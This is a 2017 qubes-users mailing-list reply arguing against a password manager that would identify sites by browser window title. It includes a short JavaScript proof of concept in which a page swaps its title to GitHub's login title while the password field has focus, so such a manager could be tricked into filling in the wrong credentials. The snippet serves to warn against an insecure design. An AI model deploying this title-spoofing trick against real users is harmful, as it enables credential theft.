On Thu, Mar 30, 2017 at 6:21 PM, Shane Optima <optima.sh...@gmail.com> wrote:
> Maybe if you (or someone) could write a Firefox extension to modify all
> browser page titles to be a concatenation of the page title and a short token
> of characters generated from a salted hash of the URL (so that I don't have
> to deal with any more hyperbole out of people like M. Ouelette), I could
> write the Dom0 bash bit. Or vice versa. Couldn't promise delivery on a tight
> deadline, though.
If you're going to write an extension then there's no reason to use window titles, since you could communicate over another channel which is not under full attacker control by default, and wouldn't have the negative UX side-effects of abusing window titles as a communication mechanism.

Furthermore, it's not hyperbole. Here's a super simple (but likely quite effective!) exploit which took me about two minutes to write:

```javascript
(function() {
  // The title a title-based password manager would associate with GitHub's login page.
  var attack_target = 'Sign in to GitHub · GitHub';
  var saved_title = '';
  var pw = document.querySelector('#password');
  // While the password field has focus, sometimes show GitHub's title instead of the real one.
  pw.addEventListener('focus', function() {
    saved_title = document.title;
    if (Math.random() < 0.2) document.title = attack_target;
  });
  // Put the real title back on blur so the swap is hard to notice.
  pw.addEventListener('blur', function() {
    document.title = saved_title;
  });
})();
```

What you are proposing is simply too dangerous and easy to exploit. For most threat models, passwords would honestly be safer if saved in the browser. For the safety of yourself and others, please don't implement this using window titles as proposed.

Don't get me wrong, your fundamental concept is a good idea, but only if the password manager authenticates the requesting site in a secure way. Window titles are absolutely not the way to do that, not even for an initial version.

--
You received this message because you are subscribed to the Google Groups "qubes-users" group.
To view this discussion on the web visit https://groups.google.com/d/msgid/qubes-users/CABQWM_An4gJZ%2BbY4i5j7j07iz9AVkp27JcCpxxjHGMDmD_kjcQ%40mail.gmail.com.